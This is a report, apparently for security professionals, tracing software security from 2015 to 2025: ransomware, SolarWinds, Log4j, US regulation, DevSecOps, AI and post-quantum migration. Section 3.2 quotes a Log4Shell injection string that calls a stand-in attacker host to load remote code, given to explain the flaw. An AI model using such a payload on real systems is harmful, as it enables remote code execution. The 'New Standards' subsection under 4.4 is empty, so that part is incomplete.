1. Introduction: The Industrialization of Digital Risk
The transformation of software security from 2015 to 2025 represents one of the most profound shifts in the history of information technology. What began as a technical discipline—often relegated to the periphery of IT operations—has metamorphosed into a geopolitical imperative, a boardroom priority, and a fundamental component of national defense.
This report provides an exhaustive analysis of this decade-long evolution, examining how the mechanisms of trust, verification, and resilience have been rewritten in the face of escalating threats and radical technological change.
In 2015, the prevailing security model was predicated on "implicit trust." Organizations trusted their internal networks, trusted their software vendors, and trusted the open-source libraries they integrated into their applications. Security was a gatekeeper function, often positioned at the end of the development lifecycle, tasked with finding vulnerabilities in code that had already been written. By 2025, this model has been entirely dismantled. The industry has moved to a paradigm of "Zero Trust" and "explicit verification," driven by a relentless series of supply chain compromises, the weaponization of open-source ecosystems, and the integration of artificial intelligence into both offensive and defensive operations.
This report serves as an authoritative resource for security professionals, synthesizing data from threat intelligence reports, regulatory frameworks, and technological analyses to construct a cohesive narrative of change. We will explore how the breakdown of the traditional perimeter forced a rethinking of identity and access; how the rise of DevOps necessitated integrating security into the earliest stages of design; and how the regulatory landscape shifted from voluntary guidelines to mandatory liability. Furthermore, we examine the specific catalysts—from the indiscriminately destructive ransomware campaigns of 2017 to the precision engineering of the SolarWinds compromise—that forced these changes.
The following analysis is structured chronologically and thematically, dissecting the era into three distinct periods: the Early Period (2015–2018), characterized by compliance and the struggle to adapt to Agile; the Mid-Period (2019–2022), defined by the shattering of supply chain trust; and the Current State (2023–2025), dominated by AI, platform consolidation, and post-quantum preparation.
1.1 The Defining Metrics of Change
To understand the scale of the evolution, it is essential to quantify the shifting metrics of success and failure over the decade. The following comparison illustrates the fundamental restructuring of the security paradigm.
| Feature | State in 2015 | State in 2025 |
|---|---|---|
| Primary Defense Model | Perimeter-based (Firewalls, VPNs) | Zero Trust & Identity-Centric |
| Release Velocity | Monthly/Quarterly (Waterfall) | Continuous (Daily/Hourly) |
| Vulnerability Management | CVSS Score (Severity) | Risk Context (Reachability/Exploitability) |
| Supply Chain Trust | Implicit Trust in Vendors | SBOMs & Attestation (Explicit Verification) |
| Regulatory Stance | Voluntary Guidelines | Mandatory Liability (EO 14028, NIS2) |
| AI Utilization | Theoretical / Research | Operational (GenAI Coding & Defense) |
| Cryptography Standard | RSA/ECC Standard | Migration to Post-Quantum (FIPS 203/204) |
| Security Responsibility | Segregated Security Team | Shared Responsibility (DevSecOps) |
Early Period Analysis: The Compliance Catalyst and the Perimeter's Last Stand
The years from 2015 to 2018 were defined by a collision between legacy security models and the accelerating pace of digital business. While the software development world was rapidly adopting Agile and DevOps methodologies to accelerate delivery, security teams were often left behind, clinging to manual review processes and perimeter-based defenses that could not keep pace. This period also marked the end of the "wild west" of data privacy, as Europe's General Data Protection Regulation (GDPR) made data protection a legal requirement rather than a best practice.
2.1 The Baseline Security Posture: Silos and Scans
In 2015, the software security landscape was still heavily influenced by the Waterfall methodology. Security testing was typically a distinct phase that occurred after development was complete, often weeks before a scheduled release. This "penetration test and patch" model created significant friction. When vulnerabilities were discovered, developers had already moved on to new projects, making remediation costly and time-consuming.1
The primary tools of the trade were Static Application Security Testing (SAST) and Dynamic Application Security Testing (DAST). However, these tools were often run in isolation. SAST tools, analyzing source code, were notorious for high false-positive rates, flagging theoretical vulnerabilities that were technically unreachable in production. This led to "alert fatigue," where developers would ignore security warnings to meet deadlines. DAST tools, scanning running applications, provided a "hacker's view" but lacked visibility into the underlying code, making it difficult for teams to pinpoint the exact location of a flaw.3
Vulnerability management during this period was driven almost exclusively by the Common Vulnerability Scoring System (CVSS). Security teams would hand developers massive PDF reports of vulnerabilities, ranked solely by theoretical severity, without context regarding whether the vulnerable component was actually loaded into memory or exposed to the internet. This lack of context created a massive backlog of "technical debt" that organizations struggled to manage.5 The prevailing sentiment was that security was the "Department of No," a blocker to innovation rather than an enabler.2
2.2 The Threat Landscape: Ransomware and Wormable Exploits
The threat landscape of the early period was characterized by indiscriminate, "spray-and-pray" attacks rather than the highly targeted supply chain operations that would define later years. Attackers focused on exploiting known vulnerabilities in unpatched systems, leveraging the lag time between patch release and deployment.
2.2.1 The Year of Ransomware (2017)
The pivotal events of this era were the WannaCry and NotPetya attacks in 2017. These incidents exploited the EternalBlue vulnerability (MS17-010) in the Windows SMB protocol—a vulnerability that Microsoft had released a patch for months earlier. Unlike modern ransomware, which often involves human-operated lateral movement, these threats were "wormable." Once they infect a single machine within a network, they spread automatically to all other vulnerable systems.6
WannaCry demonstrated the catastrophic potential of neglecting basic cyber hygiene. It infected over 200,000 computers across 150 countries within days, crippling the UK's National Health Service (NHS) and forcing ambulances to divert. NotPetya, initially disguised as ransomware, was later identified as a wiper designed to destroy data. It caused an estimated $10 billion in damages globally, paralyzing shipping giants like Maersk and pharmaceutical companies like Merck.7
2.2.2 The Rise of Fileless Malware and Cryptojacking
As organizations improved their file-based malware detection (antivirus), attackers adapted. The 2017-2018 period saw a surge in "fileless" attacks—exploits that run in memory using native system tools like PowerShell or WMI without dropping malicious files to disk. By 2017, fileless attacks were ten times more likely to succeed than traditional file-based malware, complicating forensic analysis and detection.8
Simultaneously, the booming value of cryptocurrency gave rise to cryptojacking. Threat actors shifted from stealing data to stealing compute cycles, installing unauthorized mining software on corporate servers. This was often achieved through unpatched vulnerabilities in web applications. For example, the 2017 breach of Equifax, caused by an unpatched Apache Struts vulnerability, resulted in the theft of 146 million personal records. This incident served as a brutal lesson in the necessity of Software Composition Analysis (SCA)—knowing what open-source components are running in production environments.8
2.3 The Regulatory Catalyst: GDPR and Privacy by Design
May 2018 marked a watershed moment with the enforcement of the General Data Protection Regulation (GDPR). This regulation fundamentally altered software architecture requirements, moving privacy from a legal disclaimer to a functional requirement.
Privacy by Design, mandated by Article 25 of GDPR, forced software architects to consider data minimization, pseudonymization, and encryption at the earliest stages of the System Development Life Cycle (SDLC). It was no longer acceptable to bolt on security features at the end; privacy controls had to be embedded in the application's core logic.10
The regulation also introduced strict breach notification requirements. Organizations were required to report data breaches within 72 hours of discovery. This forced companies to improve their incident detection and response capabilities drastically. The economic calculus of security shifted overnight; non-compliance could result in fines of up to 4% of global annual turnover or €20 million, making software security a board-level concern for the first time.12
The Cambridge Analytica scandal in early 2018 further amplified the public demand for data privacy. It underscored the risks associated with third-party API access and data mishandling, compelling platforms to lock down their ecosystems and developers to undergo more rigorous scrutiny.12
2.4 The Birth of DevSecOps
By 2018, the friction of the "security gate" model became untenable in the face of accelerating release cycles. Leading organizations began experimenting with DevSecOps—the philosophy of integrating security practices into the DevOps process.
Early adopters began automating SAST and dependency checks within CI/CD pipelines (e.g., Jenkins, GitLab). However, this integration was often clumsy. Traditional security tools were not designed for the speed of DevOps; slow scans would break builds, frustrating developers and leading to disabled security checks.1
Despite these early challenges, the foundation was laid. The recognition that modern applications were composed of 80-90% open-source code drove the initial adoption of SCA tools. The industry began to understand that securing the software supply chain was as critical as securing the proprietary code written in-house.9
Mid-Period Transformation: The Supply Chain Awakening and the Identity Crisis
If the early period was defined by compliance and perimeter defense, the mid-period was defined by the shattering of trust. Two specific events—the SolarWinds compromise and the Log4j vulnerability—fundamentally rewrote the rulebook for software security, demonstrating that the threat was no longer just attacking the application, but building the application.
3.1 The SolarWinds Compromise (2020): The Build System as a Target
In December 2020, the disclosure of the SolarWinds Sunburst attack revealed a terrifying new reality: attackers had compromised the software supply chain itself. This was not a traditional hack where attackers exploit a vulnerability to gain entry; it was an injection of malice into the trusted distribution mechanism.
Russian state-sponsored actors (Nobelium) compromised the SolarWinds build system (TeamCity). They injected malicious code, known as Sunspot, into the build pipeline. This malware monitored the build server for the compilation of the SolarWinds.Orion.Core.BusinessLayer.dll. When detected, Sunspot replaced the legitimate source code file with a malicious version that contained a backdoor. The compiler built the malicious code, and the resulting binary was digitally signed by SolarWinds.16
The Implications: Thousands of organizations, including US federal agencies and Fortune 500 companies, downloaded a digitally signed, "trusted" update that was, in fact, malware. This destroyed the longstanding assumption that "signed code is safe code." It demonstrated that verifying the integrity of the finished binary was insufficient; organizations needed to verify the integrity of the process that created it.18
The Industry Response: This event catalyzed the focus on Software Bill of Materials (SBOMs) and build integrity. It shifted the conversation from "application security" to "software supply chain security." Frameworks like SLSA (Supply-chain Levels for Software Artifacts) emerged to provide standards for securing the build environment and ensuring provenance.17
3.2 The Log4j Firestorm (2021): The Ubiquity of Risk
Just a year later, in December 2021, the discovery of Log4Shell (CVE-2021-44228) in the Apache Log4j library demonstrated the profound fragility of the open-source ecosystem.
The Vulnerability: A feature in Log4j known as JNDI (Java Naming and Directory Interface) lookups allowed unauthenticated remote code execution (RCE). An attacker could trigger this simply by logging a specific string (e.g., ${jndi:ldap://attacker.com/exploit}). Because Log4j is a logging library, it handles data from potentially untrusted sources—such as HTTP headers, chat messages, and input fields—making the attack surface ubiquitous.21
The Response Challenge: Unlike SolarWinds, which required patching a single vendor product, Log4j was embedded in thousands of downstream dependencies. Many organizations struggled to identify where Log4j existed in their environments because it was often a "transitive dependency"—a library used by a library used by their application. Security teams were forced to manually scour file systems, revealing the inadequacy of existing asset management practices.24
Legacy of Log4j: This incident proved that manual software inventory was obsolete. It directly accelerated the adoption of automated SCA tools and validated the necessity of the SBOM mandates that would follow. It also birthed the widespread demand for VEX (Vulnerability Exploitability eXchange) documents, allowing vendors to communicate not just what they used, but whether it was actually exploitable.26
3.3 Executive Order 14028 (2021): The Regulatory Hammer
In response to these crises, the Biden Administration issued Executive Order 14028 ("Improving the Nation's Cybersecurity") in May 2021. This was the most aggressive federal intervention in software security history, leveraging the US government's purchasing power to drive industry-wide change.
Required software developers selling to the federal government to provide a Software Bill of Materials. This effectively forced the industry to adopt transparency standards like SPDX and CycloneDX, turning SBOMs from a niche concept into a procurement requirement.20
Mandated that federal agencies move toward Zero Trust architectures, acknowledging that the perimeter defense model had failed. This pushed the private sector to follow suit, prioritizing identity verification over network location.28
NIST was tasked with defining "critical software" and establishing security standards. This moved "secure coding" from a best practice to a regulatory expectation, requiring vendors to attest to their development practices.31
3.4 The Dissolution of the Perimeter: Remote Work and Zero Trust
The COVID-19 pandemic, beginning in 2020, forced a rapid, unplanned migration to remote work. The traditional "castle-and-moat" security model, where everything inside the corporate VPN was trusted, collapsed under the strain.
Identity as the New Perimeter: With employees accessing SaaS applications from home networks and personal devices, Identity and Access Management (IAM) became the primary control plane. Multi-Factor Authentication (MFA) moved from optional to mandatory. The concept of "trusting the network" was abandoned in favor of verifying the user and the device for every request.33
VPN Vulnerabilities: As reliance on VPNs surged, they became prime targets for attackers. Critical vulnerabilities in Pulse Secure, Citrix, and Fortinet VPN concentrators were relentlessly exploited by state actors and ransomware gangs. This further drove the argument for Zero Trust solutions, such as Secure Access Service Edge (SASE), which broker connections to specific applications without placing the user on the network layer.6
3.5 Methodological Shifts: GitOps and Infrastructure as Code
During this period, the operational side of security evolved through the adoption of Infrastructure as Code (IaC).
Security as Code: With infrastructure defined in code (e.g., Terraform, Kubernetes manifests), security teams could scan environments for misconfigurations before deployment. Tools like Checkov, Trivy, and Snyk IaC emerged to scan for open S3 buckets, permissive security groups, or unencrypted databases in the CI/CD pipeline.15
GitOps: The practice of using Git as the single source of truth for infrastructure meant that every change was versioned and auditable. This improved the ability to detect unauthorized changes (configuration drift), a key defense against the persistence mechanisms attackers use. It enabled a model where operational changes were subject to the same rigorous review processes as application code.36
Current State Assessment: The Age of AI, Platforms, and Post-Quantum Preparation
By 2023, the industry had internalized the hard lessons of the supply chain crisis. The focus shifted to consolidation—managing the sprawl of security tools—and navigating the dual-edged sword of Artificial Intelligence. Simultaneously, the looming threat of quantum computing forced a transition to new cryptographic standards.
4.1 From Silos to Platforms: The Rise of ASPM
One of the most significant shifts in the 2023-2025 period was the move away from disjointed scanners toward Application Security Posture Management (ASPM).
The Problem: Developers were drowning in alerts from separate SAST, DAST, SCA, and IaC tools. Security teams lacked a unified view of risk. A vulnerability might be rated "Critical" in a library, but if that library was never loaded into memory or the vulnerable function was never called, prioritizing it was a waste of resources.37
The Solution: ASPM platforms emerged to ingest data from all stages of the SDLC (code, build, deploy, runtime). They correlate findings to determine exploitability and reachability.
- Contextual Prioritization: An ASPM tool can tell a developer, "This vulnerability in lib-crypto is critical, BUT it is only used in a test function that is not deployed to production. Downgrade priority." This bridged the gap between Dev and Sec, as developers were no longer asked to fix irrelevant bugs.39
- Market Consolidation: Major players (e.g., Palo Alto Networks, CrowdStrike, Snyk) and startups pivoted to offer "Code-to-Cloud" visibility, integrating runtime context (from cloud workload protection) back into development. This "platformization" reduced the integration tax for security teams and provided a single pane of glass for risk.42
4.2 The AI Revolution: Offense, Defense, and Development
The explosive adoption of Generative AI (GenAI) in 2023-2025 reshaped every aspect of the threat landscape.
4.2.1 AI in Development (The "Vibe Coding" Risk)
Developers increasingly relied on AI coding assistants like GitHub Copilot and Amazon Q. By 2025, nearly a quarter of production code was AI-generated.43
- Vulnerability Propagation: AI models trained on older open-source code often reproduced insecure patterns (e.g., SQL injection, hardcoded credentials) or hallucinated non-existent packages, leading to "typosquatting" attacks.44
- "Vibe Coding": A cultural shift in which developers shifted from writing code to reviewing AI output—often with less scrutiny ("it looks right, so it must be right"). This necessitated new guardrails in IDEs and CI pipelines to auto-detect AI-introduced flaws.45
4.2.2 AI in Offense
- Hyper-Realistic Phishing: Attackers used LLMs to generate perfect, context-aware phishing lures (Business Email Compromise), bypassing traditional indicators like poor grammar.
- Deepfakes: The $25 million fraud at Arup in 2024, where an employee was tricked by a deepfake video conference of their CFO and colleagues, marked a new era of "technology-enhanced social engineering".46
- Polymorphic Malware: AI was used to rewrite malware code dynamically to evade signature-based detection.47
4.2.3 AI in Defense
- Autonomous Remediation: By 2025, "Agentic AI" began to emerge in defense. Security tools could not only detect a vulnerability but also automatically generate a Pull Request to fix the code or patch the configuration, requiring only human approval.43
- Behavioral Analysis: AI models became essential for analyzing vast amounts of telemetry to detect subtle anomalies indicative of "living off the land" attacks that traditional rules missed.48
4.3 Regulatory Hardening: CISA Attestation and Cyber Trust Mark
Regulation moved from high-level orders to specific, enforceable mechanics.
CISA Self-Attestation (2024): The "Common Form" required software producers selling to the US government to attest to specific secure development practices (derived from NIST SSDF). Crucially, the CEO or a designee had to sign the attestation, introducing personal liability for false statements. This shifted security from a technical issue to a corporate governance issue.50
US Cyber Trust Mark (2024-2025): The FCC launched a voluntary labeling program for IoT devices. Consumers could scan a QR code to see a device's security status (updates, privacy policy). While voluntary, it began to create a market differentiator, pressuring manufacturers to improve baseline security to avoid being competitively disadvantaged.53
4.4 Preparing for Y2Q: Post-Quantum Cryptography
With the looming threat of cryptographically relevant quantum computers (CRQC) capable of breaking RSA and ECC encryption (Shor's algorithm), NIST finalized the first set of Post-Quantum Cryptography (PQC) standards in August 2024.
The New Standards
CNSA 2.0 Timeline: The NSA issued strict deadlines for National Security Systems (NSS). They must support these algorithms by 2025 for new software and be fully migrated by 2030 (for signatures) and 2033 (for encryption). This triggered a massive "cryptographic inventory" effort across the industry to identify where legacy crypto was hardcoded, creating a rush for Cryptographic Agility.59
5. Key Shifts Analysis: Synthesizing the Decade
The evolution from 2015 to 2025 represents a fundamental restructuring of the security paradigm. These are the macro-trends that define the era.
5.1 From "Finding Bugs" to "Managing Risk" (Context over Count)
In 2015, success was measured by the number of vulnerabilities found. In 2025, it is measured by the reduction in risk.
The Shift: The introduction of ASPM and Runtime Context fundamentally changed prioritization. Security teams no longer demand that "all Criticals be fixed." They demand that "all exploitable Criticals be fixed." This bridged the gap between Dev and Sec, as developers were no longer asked to fix irrelevant bugs.37
5.2 From "Trust but Verify" to "Zero Trust"
The perimeter model assumed that trust could be established by location (inside the VPN). The modern model assumes breach.
The Shift: Identity is the new control plane. Access to source code, build systems, and production environments is now governed by continuous authentication, least-privilege, and device health checks. The SolarWinds attack proved that even the build pipeline cannot be trusted implicitly.16
5.3 From Voluntary to Mandatory (The Liability Shift)
For years, software enjoyed a liability shield ("provided as-is").
The Shift: EO 14028, the SEC's disclosure rules (charging SolarWinds' CISO), and the EU's Cyber Resilience Act have pierced this shield. Security is now a legal duty. The CISO role has evolved from a technical IT function to a "Chief Risk Officer" role with direct reporting lines to the CEO/Board to manage this liability.62
5.4 From "Shift Left" to "Shift Everywhere"
"Shift Left" (testing early) was the slogan of 2018. By 2025, it was recognized as insufficient on its own.
The Shift: Security is now continuous. It happens at design (Threat Modeling), code (SAST/AI Assistant), build (SCA/SBOM), deploy (IaC scanning), and runtime (RASP/Cloud Defense). The loop is closed: runtime data feeds back into dev to prioritize fixes.65
6. Future Implications (2026–2030)
As we look toward the second half of the decade, several trends will crystallize, presenting new challenges and requiring strategic pivots.
6.1 The "Quantum Cliff" and Cryptographic Agility
The transition to Post-Quantum Cryptography will be the "Y2K of Security," but more complex.
Implication: Organizations that have not inventoried their cryptographic dependencies will fail to meet the NSA's 2030/2033 deadlines. "Harvest Now, Decrypt Later" attacks will intensify, forcing companies to immediately encrypt long-term sensitive data with hybrid (classical + PQC) schemes. Cryptographic Agility—the ability to swap algorithms without rewriting applications—will become a primary architectural requirement.59
6.2 Agentic Security and the "Self-Healing" Stack
AI will move from a "Copilot" (advisor) to an "Agent" (actor).
Implication: We will see the rise of Autonomous Security Operations Centers (ASOCs) where AI agents detect an intrusion, isolate the affected container, patch the vulnerability in the code, test the fix, and redeploy—all without human intervention. The human role will shift to governance and policy definition.43
6.3 The Fragmentation of the Global Stack
Geopolitical tensions and divergent regulatory regimes (EU's GDPR/CRA vs. US EO 14028 vs. China's regulations) are leading to a "Splinternet" of software compliance.
Implication: Global software vendors will face increasing difficulty maintaining a single codebase. We may see the "regionalization" of software supply chains, where components must be vetted and hosted within specific sovereign borders to meet local "Digital Sovereignty" requirements.63
6.4 The Death of "Implicitly Trusted" Open Source
The Log4j and XZ Utils incidents have permanently scarred the open-source ecosystem.
Implication: The era of freely pulling dependencies from npm or PyPI is ending for enterprise software. Organizations will move toward Curated Private Registries, where every package is vetted, scanned, and perhaps even "rebuilt" internally to ensure provenance. The "free lunch" of open source now comes with a "verification tax".18
Conclusion
The decade from 2015 to 2025 transformed software security from a technical niche into a central pillar of digital civilization. We have learned that we cannot secure what we cannot see (Log4j), that we cannot trust what we do not verify (SolarWinds), and that the perimeter is everywhere (Zero Trust). As we enter the AI and Quantum eras, the fundamental lesson remains: the organizations that thrive in 2030 will be those that have successfully embedded this truth into their culture, their code, and their boardrooms.
Works Cited
1. What is Agile DevSecOps? - GitLab. https://about.gitlab.com/topics/agile-devsecops/
2. Waterfall vs Agile vs DevOps - Medium. medium.com
3. SAST, DAST & IAST - Imperva. imperva.com
4. SAST vs DAST vs IAST vs RASP 2025 - DeepStrike. deepstrike.io
5. Software Vulnerability Landscape Study - NIST. nist.gov
6. Evolution of Cybersecurity Vulnerability Management - AI Security Chronicles. aisecuritychronicles.org
7. Evolving Cybersecurity Threat Landscape - Electronic Specifier. electronicspecifier.com
8. Modern Threat Landscape Guide - Kaspersky. kaspersky.com
9. The Evolving CVE Landscape - F5 Labs. f5.com
10. GDPR's Impact on Cybersecurity - IJSRA. ijsra.net
11. GDPR Impact on Software Development - Ideafloats. ideafloats.com
12. GDPR Impact on Data Security - NABCoIT. nabcoit.com
13. GDPR Compliance - Fortra. fortra.com
14. Pre-commit - OWASP DevSecOps Guideline. owasp.org
15. Evolution from DevOps to DevSecOps - Cogent University. cogentuniversity.com
16. Software Supply Chain Attack Vectors - NSF. nsf.gov
17. OWASP Top 10 2025: Supply Chain - Secure Code Warrior. securecodewarrior.com
18. Security Frameworks Supply Chain - Reversing Labs. reversinglabs.com
19. Software Supply Chain Security Regulations - DZone. dzone.com
20. SBOM Consumption Practices - CISA. cisa.gov
21. SolarWinds Supply Chain Attack - OpenText. microfocus.com
22. Log4j Vulnerabilities and DevSecOps - Illumio. illumio.com
23. Log4j Vulnerable to RCE - Google Cloud. cloud.google.com
24. SBOM: Cornerstone of Software Security - INCYBER. incyber.org
25. SBOM Security Game-Changer - Bureau Veritas. bureauveritas.com
26. Supply Chain Risks and Log4j - Tanium. tanium.com
27. Apache Log4j 2 Recommendations - Google Cloud. cloud.google.com
28. EO Improving Cybersecurity - CISA. cisa.gov
29. EO14028 Timeline - aDolus. adolus.com
30. Executive Order 14028 - Palo Alto Networks. paloaltonetworks.com
31. EO 14028 - NIST. nist.gov
32. Presidential Documents - OFAC. treasury.gov
33. State of Cybersecurity 2025 - Ivanti. ivanti.com
34. DevSecOps Stories - DevSecOps Guides. devsecopsguides.com
35. DevSecOps Best Practices 2025 - Codefresh. codefresh.io
36. Software Development Trends 2025 - Graphite. graphite.com
37. From VM to ASPM - RiskInsight. riskinsight-wavestone.com
38. AppSec to ASPM Transition - Apiiro. apiiro.com
39. What is ASPM? - OpsMx. opsmx.com
40. ASPM Key Components - Cycode. cycode.com
41. Leveraging ASPM - Veracode. veracode.com
42. ASPM Tools - Palo Alto Networks. paloaltonetworks.com
43. AI-Generated Code Breaches - RG-CS. rg-cs.co.uk
44. AI Coding Tools Security - Fortune. fortune.com
45. AI Security Trends 2025 - Checkmarx. checkmarx.com
46. AI Cybersecurity Threats - DeepStrike. deepstrike.io
47. Weekly Recap - The Hacker News. thehackernews.com
48. AI Security Trends - Auxis. auxis.com
49. AI Cybersecurity Use Cases - AIMultiple. aimultiple.com
50. Secure Software Attestation Form - CISA. cisa.gov
51. Secure Software Development Attestation - CISA. cisa.gov
52. CISA Self-Attestation Implications - Chertoff Group. chertoffgroup.com
53. IoT Cybersecurity Labeling - BakerHostetler. bakerlaw.com
54. US Cyber Trust Mark - IoT For All. iotforall.com
55. FCC Cybersecurity Labeling - Nabto. nabto.com
56. PQC Standardization Process - NIST CSRC. nist.gov
57. NIST PQC Standardization - Wikipedia. wikipedia.org
58. NIST Post-Quantum Standards - Terra Quantum. terraquantum.swiss
59. E2E Encryption CNSA 2.0 - Garantir. garantir.io
60. NSA CNSA 2.0 - PostQuantum. postquantum.com
61. Quantum-Proof CNSA 2.0 - Encryption Consulting. encryptionconsulting.com
62. CISO Role Changes 2025 - Sprinto. sprinto.com
63. Elevating Cybersecurity - WEF. weforum.org
64. CISO Survey 2024 - Heidrick & Struggles. heidrick.com
65. AppSec Trends 2026 - OX Security. ox.security
66. SAST vs DAST - Wiz. wiz.io
67. Quantum Threats Federal Agencies - GTI. governmenttechnologyinsider.com
68. Quantum Diplomacy Report - CERN. cern.ch
69. Closing the Chain - Moonlight. themoonlight.io